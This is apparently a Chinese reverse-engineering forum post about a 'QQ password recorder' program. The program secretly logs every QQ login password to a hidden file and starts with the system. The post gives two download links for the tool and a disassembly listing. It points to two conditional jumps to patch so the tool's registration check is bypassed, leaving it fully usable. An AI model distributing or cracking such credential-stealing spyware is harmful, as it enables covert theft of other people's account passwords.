哎~今天随便下了一个软件~~~
准备练练手的~~~
谁知道。算法又无法分析出来~~~
软件介绍
又名qq密码记录器,本程序为绿色软件,无需安装。使用方法,点击QQPwd.exe 启动程序 程序启动后,点击开始监控,监控程序后台运行,然后所有的登陆过的QQ密码都记录在c:qqpass.txt文件里以后监控程序每次开机会自动运行。然后,你已经可以退出QQpwd这个配置程序了 qqpass.txt属性为隐藏。
下载地址:http://www.ngnsss.com/softlist/QQPwd.rar
如果上面地址不行我传我空间一份
http://www.518sf.cn/soft/qqpwd.exe
希望大家都来研究一下~~
给我们这样的*鸟学习一下~~~
爆破。。
=================
:00402189 E8B2020000 call 00402440
:0040218E 83C404 add esp, 00000004
:00402191 85C0 test eax, eax
:00402193 0F85A4000000 jne 0040223D //经典句语。。
:00402199 8D442408 lea eax, dword ptr [esp+08]
:0040219D 50 push eax
* Possible StringData Ref from Data Obj ->"software\ngnsss"
|
:0040219E 6814A14100 push 0041A114
:004021A3 6802000080 push 80000002
* Reference To: ADVAPI32.RegCreateKeyA, Ord:01CBh
|
:004021A8 FF1520404100 Call dword ptr [00414020]
:004021AE 8B4C2404 mov ecx, dword ptr [esp+04]
:004021B2 8B41F8 mov eax, dword ptr [ecx-08]
:004021B5 8D4C2404 lea ecx, dword ptr [esp+04]
:004021B9 50 push eax
:004021BA 6804010000 push 00000104
:004021BF E8ACC80000 call 0040EA70
:004021C4 8B54240C mov edx, dword ptr [esp+0C]
:004021C8 50 push eax
:004021C9 6A01 push 00000001
:004021CB 6A00 push 00000000
* Possible StringData Ref from Data Obj ->"qqpwdreg"
|
:004021CD 6808A14100 push 0041A108
:004021D2 52 push edx
* Reference To: ADVAPI32.RegSetValueExA, Ord:01F8h
|
:004021D3 FF151C404100 Call dword ptr [0041401C]
:004021D9 8B442408 mov eax, dword ptr [esp+08]
:004021DD 50 push eax
* Reference To: ADVAPI32.RegCloseKey, Ord:01C8h
|
:004021DE FF1508404100 Call dword ptr [00414008]
:004021E4 8B4C2404 mov ecx, dword ptr [esp+04]
:004021E8 6A00 push 00000000
:004021EA 51 push ecx
* Possible StringData Ref from Data Obj ->"注册成功"
|
:004021EB 68C8A14100 push 0041A1C8
:004021F0 8BCE mov ecx, esi
:004021F2 C7861401000001000000 mov dword ptr [esi+00000114], 00000001
:004021FC E88FAC0000 call 0040CE90
:00402201 6A00 push 00000000
:00402203 8D4E5C lea ecx, dword ptr [esi+5C]
:00402206 E89BBE0000 call 0040E0A6
:0040220B 8D4C2404 lea ecx, dword ptr [esp+04]
:0040220F C684243401000000 mov byte ptr [esp+00000134], 00
:00402217 E870C60000 call 0040E88C
:0040221C 8D8C2428010000 lea ecx, dword ptr [esp+00000128]
:00402223 C784243401000003000000 mov dword ptr [esp+00000134], 00000003
:0040222E E859C60000 call 0040E88C
:00402233 C684243401000002 mov byte ptr [esp+00000134], 02
:0040223B EB43 jmp 00402280
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00402193(C)
|
:0040223D 6A00 push 00000000
* Possible StringData Ref from Data Obj ->"NGNSSS"
|
:0040223F 68C0A14100 push 0041A1C0
* Possible StringData Ref from Data Obj ->"注册号无效"
|
:00402244 68B4A14100 push 0041A1B4
:00402249 8BCE mov ecx, esi
:0040224B E840AC0000 call 0040CE90
===============================
* Possible StringData Ref from Data Obj ->"NGNSSS"
|
:004025D0 68C0A14100 push 0041A1C0
:004025D5 7515 jne 004025EC //改~~~
* Possible StringData Ref from Data Obj ->"注册成功"
|
:004025D7 68C8A14100 push 0041A1C8
:004025DC 8BCE mov ecx, esi
:004025DE E8ADA80000 call 0040CE90
:004025E3 8BCE mov ecx, esi
:004025E5 E8A2D40000 call 0040FA8C
:004025EA EB0C jmp 004025F8
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004025D5(C)
|
* Possible StringData Ref from Data Obj ->"注册号无效"
|
:004025EC 68B4A14100 push 0041A1B4
:004025F1 8BCE mov ecx, esi
:004025F3 E898A80000 call 0040CE90
=========================
程序两处校验~~~改了就OK~~
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
提醒一下.
